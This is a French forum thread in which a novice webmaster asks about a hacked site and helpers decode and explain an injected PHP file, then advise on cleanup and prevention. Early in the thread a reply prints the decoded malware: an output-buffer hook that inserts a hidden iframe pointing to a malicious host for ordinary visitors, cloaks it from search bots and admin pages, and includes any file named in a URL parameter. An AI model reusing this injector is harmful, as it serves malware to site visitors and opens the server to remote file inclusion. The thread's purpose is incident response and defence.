Bonjour et bonne année !

Bon l'année commence mal, ma surprise du 1er janvier 2010 a été de voir avast s'affoler lorsque j'ai tenter de me connecter à mon site. Impossible de me connecter virus virus virus. Je vais donc sur mon ftp et je vois un nouveau fichier php incompréhensible et mon htacces changé (il lui indiquait de pointer vers ce fichier.php). Bon je pense que le but est de rendre mon site indisponible (la concurrence est à mon avis la coupable) mais le code veut dire quoi ? et que faut il que je change dans mon code pour éviter cela ?
Pour info j'ai mis des include dans mon site pour afficher le menu du haut de mon site et j'ai un formulaire de contact en php. E
voici le code insérer dans ce fameux fichier .php Il me semble que ce code est crypté ou du moins dé-codable, j'avoue ne pas trop savoir mais j'ai vue des choses similaires sur des forums.

et voila le htaccess
Voila, je suis novice en php, alors j'ai besoin de votre aide pour sécuriser mon site des attaques et comprendre ces fichiers incompréhensibles à mes yeux.
Merci d'avance !

Pour te faire une idée voici le résultat du base64_decode :

<?php

//<div style="display:none">&nbsp; &nbsp;<iframe fsdsdf="sdfdf" width="732" height="4051" src="http://grizzli-counter.com/id120/index.php"></iframe></div>'; 
function IIIIIIIIIIII($IIIIIIIIIIIl) { 
    global $argv; 
    $IIIIIIIIIIlI = dirname(getcwd() . '/' . $IIIIIIIIIIIl);
    $IIIIIIIIIIll = getcwd();
    @chdir($IIIIIIIIIIlI);
    $IIIIIIIIIIlI = getcwd();
    @chdir($IIIIIIIIIIll);
    return $IIIIIIIIIIlI; 
} 
function IIIIIIIIIIIl($IIIIIIIIIIl1) {
    if( strstr($IIIIIIIIIIl1, "Yandex/") != null || strstr($IIIIIIIIIIl1, "YaDirectBot") != null || strstr($IIIIIIIIIIl1, "James Bond") != null || strstr($IIIIIIIIIIl1, "Googlebot") != null || strstr($IIIIIIIIIIl1, "Mediapartners-Google") != null || strstr($IIIIIIIIIIl1, "StackRambler") != null || strstr($IIIIIIIIIIl1, "Slurp") != null || strstr($IIIIIIIIIIl1, "msnbot") != null ) {
        return true; 
    } return false; 
} function IIIIIIIIIII1($IIIIIIIIIIlI) { 
    $IIIIIIIIII1I = array('adm', 'pma', 'moder', 'cp');
    $IIIIIIIIII1l = false;
    foreach ($IIIIIIIIII1I as $IIIIIIIIII11) {
        if(strstr($IIIIIIIIIIlI, $IIIIIIIIII11) != null) {
            $IIIIIIIIII1l = true; 
        } 
    }
    return $IIIIIIIIII1l; 
}
function IIIIIIIIIIlI($IIIIIIIIIlII) {
    global $IIIIIIIIIIII, $_SERVER;
    $IIIIIIIIIlII = preg_replace('/<iframe.*style=.*hidden.*\/iframe[^>]*>/i', "", $IIIIIIIIIlII);
    $IIIIIIIIIlII = preg_replace('/<div.*style=.*display:none.*[^>]*>.*<iframe .*\/.*div[^>]*>/i', "", $IIIIIIIIIlII);
    $IIIIIIIIIlII = preg_replace('/<!-- ad --><script[^>]*>.*<\/script><!-- \/ad -->/i', "", $IIIIIIIIIlII);
    if(IIIIIIIIIIIl($_SERVER['HTTP_USER_AGENT']) == true || IIIIIIIIIII1(dirname($_SERVER['SCRIPT_NAME'])) == true) {
        return $IIIIIIIIIlII; 
    }
    else {
        if(preg_match("/(<body[^>]*>)/i", $IIIIIIIIIlII) > 0) {
            return preg_replace("/(<body[^>]*>)/i", "$IIIIIIIIIlI1 \n".$IIIIIIIIIIII, $IIIIIIIIIlII, 1); 
        }
        else {
            return $IIIIIIIIIlII.$IIIIIIIIIIII; 
        } 
    } 
} 
if(@ob_start('IIIIIIIIIIlI') == true) {
    
    $IIIIIIIIIIIl = $_GET['qq'];
    @chdir(IIIIIIIIIIII($IIIIIIIIIIIl));
    include($IIIIIIIIIIIl);
}
else {
    echo $IIIIIIIIIIII; 
}

?>

Le tout sera executer par le eval;

En gros tu execute un code malveillant a chaque affichage.

TU peux changer tes codes d'accès FTP , SQL et toutes les données de ton site s'il est sensible.
SInon les experts du forum te répondront plus précisement

Bye HAwk.

Ok merci , mais il sert à quoi ce programme malveillant. Quel est son but ? Et surtout comment protéger mon code pour éviter ce désagrément.
Maintenant que vous m'avez aidé a décrypter ce code, pouvez vous me donner la procédure pour que je puisse le faire de mon coté si cela recommençait.
Merci les amis de m'aider car j'avoue que ces gars ne servent à rien à part à pourrir mon site et mon travail.

Remplace eval() par print(). Au lieu d'évaluer le code ca l'affichera. Pour ce qu'il fait, il inclue une page, probablement un virus. Mais après, pour savoir ou elle est, c'est un peu compliqué. Il faudrait executer le scipt (sans le include) puis a la fin trouver la path

La première des choses à faire, c'est effectivement de changer tous tes mots de passe. Avec un minimum de sécurité, tu peux envisager au moins 8 caractères et au moins 3 des 4 possibilités suivantes :
- au moins une minuscule
- au moins une majuscule
- au moins un chiffre
- au moins un caractère spécial

Ensuite, il te faut vérifier si ton site permet l'upload de fichier, que celui-ci ne permet pas d'uploader des fichiers avec l'extension php.
De même si ton site fonctionne avec des includes, t'assurer qu'on ne puisse pas inclure autre chose que les pages que tu as prévu (en gros, qu'en modifiant l'url je ne puisse pas ouvrir une url distante ou d'autres fichiers de ton serveur, comme celui contenant les accès à la base)

Bien sur, il faut supprimer les fichiers qui ont été ajoutés et passer un coup d'antivirus sur le serveur.

Quant aux effets du script, il ouvre dans un premier temps le site grizzli-counter.com, qui est apparement considéré comme malveillant (par google et symantec). Apparement il tente d'installer un cheval de troie chez les visiteurs et sans doute d'autres cochoncetés...

La première des choses à faire, c'est effectivement de changer tous tes mots de passe. Avec un minimum de sécurité, tu peux envisager au moins 8 caractères et au moins 3 des 4 possibilités suivantes :
- au moins une minuscule
- au moins une majuscule
- au moins un chiffre
- au moins un caractère spécial

Ensuite, il te faut vérifier si ton site permet l'upload de fichier, que celui-ci ne permet pas d'uploader des fichiers avec l'extension php.
De même si ton site fonctionne avec des includes, t'assurer qu'on ne puisse pas inclure autre chose que les pages que tu as prévu (en gros, qu'en modifiant l'url je ne puisse pas ouvrir une url distante ou d'autres fichiers de ton serveur, comme celui contenant les accès à la base)

Bien sur, il faut supprimer les fichiers qui ont été ajoutés et passer un coup d'antivirus sur le serveur.

Quant aux effets du script, il ouvre dans un premier temps le site grizzli-counter.com, qui est apparement considéré comme malveillant (par google et symantec). Apparement il tente d'installer un cheval de troie chez les visiteurs et sans doute d'autres cochoncetés...

Ok je vois un peu le truc. Sur mon site je n'ai pas mis de upload mais j'ai très récemment mis des includes pour mes menus, regardez plutôt

<?php include ("menu.php"); ?>

et à mon avis c'est la que j'ai un pépin car j'ai lu qu'il fallait faire différemment mais je ne sais plus comment faire. Avez vous une piste ?

Ton include est correct, il inclut uniquement le fichier menu.php qui se trouve sur ton serveur et n'est pas en remettre en cause

C'est seulement si tu passais des paramètres dynamiques à la fonction include (par exemple si tu faisais un "include($_POST[''menu'])") qu'il faudrait ajouter des contrôles pour s'assurer que l'utilisateur ne puisse pas accéder à tout et n'importe quoi sur ton serveur

Dans les cas que j'ai vu autrefois, cette injection de fichieres php ou html avec un virus c'est passé par ftp.
Le mot de passe a été "volé" par un trojan qui a transmis les données à un serveur. La contamination a été fait par des robots installé sur ce serveur.
En conclusion, avant de changer ton mot de passe c'est bien de scanner ton ordinateur avec un logiciel antivirus.

Dans les cas que j'ai vu autrefois, cette injection de fichieres php ou html avec un virus c'est passé par ftp.
Le mot de passe a été "volé" par un trojan qui a transmis les données à un serveur. La contamination a été fait par des robots installé sur ce serveur.
En conclusion, avant de changer ton mot de passe c'est bien de scanner ton ordinateur avec un logiciel antivirus.

Merci florinn,
Heuresement avast m'a averti du virus et a abandonné la connexion. J'ai ensuite pu supprimer les fichiers de mon serveur et changer mon mot de passe. Mon site est sur un serveur OVH et je ne comprends tjrs pas comment le hacker a fait cela.
Si quelqu'un a une piste, je suis preneur.

Slt ,

Les logs ...
Épluche les logs de tes services "critiques" .. connexion SSH , FTP , Ect ...
Les logs apache , le pirate n'a pas réussit du premier coup , il doit y avoir de nombreuses tentatives inscrites dans les logs ( si l'intrusion est récente ).

( évidemment uniquement si tu as accès aux logs .. )

Ensuite , qui a t'il sur ton serveur ?
Uniquement des développements perso ? ( il y a des chances qu'il y ai une/des failles d'injection de code ) , code à éprouver .
Des "sites/blog/CMS ect .. " ? si oui sont-ils à jour ?

Voilà , en attendant , tu devrais mettre les sites hors ligne , pour éviter que des internautes tombent dessus et se font avoir , de plus tu risques d'être black-listé par les navigateurs ...

Cdt ,
Ch.

Slt ,

Les logs ...
Épluche les logs de tes services "critiques" .. connexion SSH , FTP , Ect ...
Les logs apache , le pirate n'a pas réussit du premier coup , il doit y avoir de nombreuses tentatives inscrites dans les logs ( si l'intrusion est récente ).

( évidemment uniquement si tu as accès aux logs .. )

Ensuite , qui a t'il sur ton serveur ?
Uniquement des développements perso ? ( il y a des chances qu'il y ai une/des failles d'injection de code ) , code à éprouver .
Des "sites/blog/CMS ect .. " ? si oui sont-ils à jour ?

Voilà , en attendant , tu devrais mettre les sites hors ligne , pour éviter que des internautes tombent dessus et se font avoir , de plus tu risques d'être black-listé par les navigateurs ...

Cdt ,
Ch.

Bonjour et merci pour ces infos importantes.

Il n'y a que du code que j'ai développé sans cms ni blog. J'ai insérer des scripts de formulaires et les injections peuvent venir de là. Autrement j'ai un peu de javascript à la sauce Jquery. Pour les log je suis sur OVH comme hébergeur et je ne sais pas comment les consulter par contre j'aimerais installer un script que me place toutes les ip des visiteurs avec la date et l'heure dans un fichier texte comme cela je pourrai voir qui a été le dernier connecté avant le crash (si bien sur cela se reproduisait).
Merci pour l'aide.

j'aimerais installer un script que me place toutes les ip des visiteurs avec la date et l'heure dans un fichier texte comme cela je pourrai voir qui a été le dernier connecté avant le crash (si bien sur cela se reproduisait).

Justement, les logs sont là pour ça.

Avast t'a averti d'un virus dans la page web.
Je parlais d'un virus (trojan) dans ton ordinateur (ou dans un autre ordinateur d'où tu as fait une connexion ftp à ton site) qui "vole" les mots de passe.

Par exemple:
http://simvez.com/web/virus-iframehtml- ... -flashfxp/

Avast t'a averti d'un virus dans la page web.
Je parlais d'un virus (trojan) dans ton ordinateur (ou dans un autre ordinateur d'où tu as fait une connexion ftp à ton site) qui "vole" les mots de passe.

Par exemple:
http://simvez.com/web/virus-iframehtml- ... -flashfxp/

Ah oui pas bête , je vais scanner mes pc et voir tout cela merci. J'ai vu les logs sur le serveur et j'ai constaté l'envoi de fichier fin décembre. L'adresse ip me renvoie en Allemagne.
A voir si il a utilisé un proxy ou autre astuce.
merci